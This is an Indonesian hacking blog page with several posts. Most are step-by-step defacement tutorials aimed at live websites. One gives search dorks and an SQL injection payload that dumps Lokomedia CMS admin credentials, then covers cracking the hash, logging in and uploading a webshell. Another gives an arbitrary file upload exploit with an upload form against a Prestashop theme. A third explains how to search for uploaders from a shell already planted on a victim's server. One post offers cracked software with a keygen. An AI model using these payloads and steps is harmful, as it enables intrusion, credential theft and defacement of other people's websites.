Featured Posts
Monday 30 October 2023
Wednesday 29 June 2016
Tutorial Deface dengan SQL Lokomedia
15:26
-
No comments
Hello World ; Siang Fans, Please Say Hello Haters :*
xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs, pade masihh kuat kan puasanyee ampe bedug maghrib akwkwak :D
yoks, kali ini Gue akan ngebahas salah Satu Bug/Celah yg ada pada CMS Lokomedia nih, kite suntik2an dlu, *jekinjectbumi akwkwak :p *ini tutor lama sih >.< *share aja, kali aja masih
Langsung aje Tutorial SQL Injection on Lokomedia CMS .
Langsung intip tutor ;*
Dork : - inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
(kembangin lagi gunakan otak bokepers Lu, biar dpt yg Vuln and Verawan gengs ;*)
eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
1. Dorking menggunakan Search Engine
2. Pilih web target, Lalu masukan eXploitnya.
di target saya menjadi seperti ini: target.c0li/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html
silahkan oprek2 sendiri Query yg pas utk Target agan |
Sekarang sudah kelihatan user sama passwordnya di bagian title.
kemudian ctrl+u untuk melihatnya lebih jelas.
Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Kalean bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.
Untuk login biasanya di :
- www.target.c0li/admin
- www.target.c0li/adminweb
- www.target.c0li/administrator
- www.target.c0li/redaktur
Kali ini loginnya berada di target.c0li/adminweb/
, Kemudian masukan user dan pass di form. Dan hasilnya seperti ini
Untuk mengupload shell bisa dibagian Download, seperti ini
Untuk mengakses shell biasanya di target.c0li/files/namashellLu
*Shell harus berekstensi .phtml *atao coba bypass ekstensi ke yg laen :3
eh sebelumnya add OA Line Kami yoo, kami bagi2in Tema Official TKJ Cyber Art loh: http://line.me/ti/p/%40hjl8740i
dah ah, gue mauu Bobo Ganteng dluu -> terus bangun pas Bedug awkkwa
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Salam Suntikan Gengs :3
Sekian dan semoga bermanfaat .. terimakasih
Source and Thanks to: Bocah Berisik
./Nuenomaru
Awali Hari Lu dengan Secangkir Caffeine, dan Sentuhan Nikotin :) |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
Cara Mencari file Uploader di Website
02:56
-
No comments
*nb: Diperuntukan buat yang sudah Menanam WebShell di web korban
xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs.
kali ini Nue bakal Share tools keren buatan Bang Tu5b0l3d .
ini cocok banget buat yg pengen menemukan bug baru di plugins atau themes wordpress atau joomla dan CMS Lainnya.
bukan menemukan bug baru sih, tapi menemukan file yang ada kata - kata uploadnya melalui shell.
tool ini juga bisa dijalananin di OS apa aja : Windows, Linux, Other.
ya daripada kita buka satu - satu dir untuk nyari file upload.
mending pakai tool ini. Lanjut Simak Cara Mencari file Uploader di Website
Lanjut intip Tutorial ;*
ada 2 file yang dipakai disini.
search.php
http://pastebin.com/G1vnLbUt | Drive Google
index.php
http://pastebin.com/nenExAFA | Drive Google
*silahkan edit2 dikit lalu masukan url web korban
file search.php langsung diupload aja ke websitenya.
Upload melalui WebShell yg udh lu tanem di webtarget *bebas taro di Dir mane ajeh |
file index.php dibuka dan diedit bagian Dir nya.
*Kalo lu pengguna windows taro file index.php di xampp/php/ *klo yg pake xampp
*kalo lu pengguna Linux bisa di direktori /var/www *aktifkan apache2 start
usage:
php index.php www.target.c0li/search.php
Jika tools berhasil menemukan file Uploader dia akan muncul dengan tulisan "nemuu".
nah kalo kek gitu silahkan buka link file uploadernya melalui Browser kesayangan Lu wkwkwk >.<" <(") *Lumayankankalonemubugbaru :3
video:
https://youtu.be/lniKnyGLxoo
untuk Selanjutnya Silahkan Lu explore sendiri Nih tool, Dan untuk informasi lain bisa kalian tanya2 di Grup FB mereka: https://www.facebook.com/groups/indoxploitpublic/
eh sebelumnya add OA Line Kami yoo, kami bagi2in Tema Official TKJ Cyber Art loh: http://line.me/ti/p/%40hjl8740i
dah ah, gue mauu Sahuurrr dluu -> terus lanjots Bobo Ganteng awkkwa
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Salam Pentest gengs~
Sekian dan semoga bermanfaat .. terimakasih
Source and Thanks to: Bang Ilham Mukti A.K.A Tu5b0l3d | indoXploit
./Nuenomaru
tidak perlu muncul ke permukaan , yang penting tetap bergerilya |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
Monday 27 June 2016
Deep Freeze Server Enterprise 8.33.270.5131 Full Keygen
13:24
-
No comments
Deep Freeze Server Enterprise 8.33.270.5131 Full Keygen | 44.1MB |
Deep Freeze is a tool that really directly protect and maintain your computer configuration. You do not need to fear the changes made by the user to a workstation, simply restart to eradicate all changes and reset the computer to its original state. Expensive computer assets are kept running at 100% capacity and technical support time is reduced or eliminated altogether. The result is consistent trouble-free computing on a network that is truly protected and parallel, completely free of harmful viruses and unwanted programs
Security and Control
- Encrypt all components with a unique Customization Code
- Preset multiple passwords to be used on a workstation or via the Command Line Control with varying activation and expiration dates
- Generate encrypted One Time or One Day Passwords
- Disable keyboard and mouse during maintenance periods or on demand
- Boot Control window provides ability for immediate reboot
- Create customized installation files using the Configuration Administrator
- Pre-select Frozen Drives and selectively Freeze or Thaw fixed drives
- Schedule automatic Restart/Shutdown times
- Restart computer on Logoff
- Shutdown workstations after a preset length of inactivity
- Schedule Thawed Maintenance periods to perform Windows updates through the Internet or a SUS/WSUS server or Anti-Virus Updates
- Schedule Send Message tasks
Rar Password
freesoft88
Sunday 26 June 2016
Cara Mudah Ekstrak file Di GNU/Linux Lewat Terminal dengan Lazy Extractor
22:59
-
No comments
Hello World ; Malam Fans, Please Say Hello Haters :*
xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs.
Malam ini gua bakal Ngenalin Tool utk mempermudah para Linuxer ekstrak File lewat Terminal nih :D yepp namanya adalah Lazy Extractor
Lazext atau lazy Extactor adalah tools untuk mempermudah ekstrak file di GNU/Linux menggunakan CLI mode atau terminal. Jadi mungkin sangat berguna bagi kalian yang menggunakan Linux Server dan sistem operasi Linux tanpa DE.
karena Besok gua masuk gawe jadii gak usah banyak bacote deh
Intip tutorial ;*
Editing By: Yiyop[s] |
Cara installnya cukup mudah. Karena tinggal menggunakan git clone .
git clone https://github.com/Screetsec/Lazext.git
cd Lazext
chmod +x Lazext
./Lazext
Ini adalah Penampakan toolnya:
pade artikel ini gue praktekinnya di Kali Linux, Silahkan cobain di Distro2 Linux kesayangan anda :D
di tool iini lengkap opsi2 utk mengEkstrak sesuai archive ekstensinya masing2.
Cara menggunakannya pun cukup mudah. Cukup masukkan menu keberapa yang ingin digunakan.
Misal saya ingin mengekstrak file .tar.bz2 , maka pilih nomor 1.
Jangan lupa masukkan path dimana file berada, jika file tersebut tidak berada satu folder dengan Lazext. ya kalo satu folder ama ini tool, ye gak usah make path lageh :3
tinggal Lu cek deh, output atau Hasil ekstraknya berada di Folder Output, *dia bakal buat otomatis Folder Output yg berisi data2 Hasil Ekstrakan.
untuk Selanjutnya Silahkan Lu explore sendiri Nih tool, Dan untuk informasi lain bisa kalian cek di halaman github mereka.
Semooogaaa bermanfaat dan membantu Linuxer pemula macam Nue ini :'D :'D akwkwak
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
Salam para penjinak pinguin :v , Penunggang Naga, Viva Real Tux Warrior Gaes :'v wkkwkwkw
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Salam Linuxer Gengs
Sekian dan semoga bermanfaat .. terimakasih
Source and Thanks to: LinuxSec
./Nuenomaru
Level Lu Ez, ngalahin Lu itu gak Susah :) |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
Thursday 23 June 2016
Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
08:58
-
No comments
halo bertemu lagi dengan saya ,uyulcrack..
udah lama nih ga upload,,, biasa terlalu sibuk di dunia nyata.
oke,, lanjut saja nih Tutorial Deface eXploit Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload . *exploit baru nanti dijelaskan dibawah.
Dan makasih juga untuk bang People_hurt untuk live targetnya ....
Langsung ke tutor
#- Title: Joomla Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
#- Author: people_hurt
#- Published : 21/06/2016
#- Developer : iqit-commerce
#- Link Download : themeforest .net/item/warehouse-responsive-prestashop-16-theme-blog/3178575
#- Fixed in Version : -
#- Tested on : windows , Linux , Other
Dork:
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
inurl:"/modules/columnadverts/"
masih bisa dikembangkan, cari /modules/namamoduleyglaen *Use your brain br0
1. disini gua jelasinnya lu pada udah ada CSRF nya ya jadi langsung praktek aja, pertama cari dulu target lwt Dorking di Search Engine
2. kalo dah ketemu masukin deh exploit nya satu-satu sampe ketemu ERROR
Exploit &poc :
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"
(TERGANTUNG PAS DORKING namamodule NYA)
target.coli/[path]/modules/namamodule/uploadimage.php |
4. nah dibawah ini CSRF nya, masukin aja sourcodenya dan ubah format ke HTML
CSRF:
<form method="POST" action="target.co.li/modules/namamodule/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
5. kalo udah buka deh CSRF nya pake browser kesukaan sobat
Upload File/Shell Lu |
6. kalo sukses upload bakalan kayak gini
Muncul Nama Shell/File yg Lu Upload |
7. akses shell target.co.li/modules/namamodule/slides/namashellLu
target.coli/[path]/modules/namamodule/slides/namashellLu |
nah setelah itu terserah sobat dah maudiapain, saran dari gua sih titip file aja ama laporin bugnya, jangan salah digunainyaa , gua cuman share apa yang gua bisa dan live praktek gua sendiri jadi kecelakaan ditanggung oleh situ bukan pengarang ....
ayo Jangan Jadi Silent Reader, minimal kalo gak mau komen, tolong bagikan yak >.<"
atau Like fanspage gua: UyulCrack | Orthellys
Like juga fanspage TKJ Cyber Art | kalau ada yg mau bertanya, terus atau kasih saran dan kritikan Silahkan kirim ke wall FP kami *kritikan dan saran yg membangun ya gengs.
Semoga bermanfaat & Membantu Sobat..
sampai ketemu lagi BAAAYYYYY .....
source and thanks to: People_hurt
uyulcrack
Kami Membuat Sejarah, Bukan hanya Barisan Kisah #staycoolandkeep./crootz |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
Subscribe to:
Posts (Atom)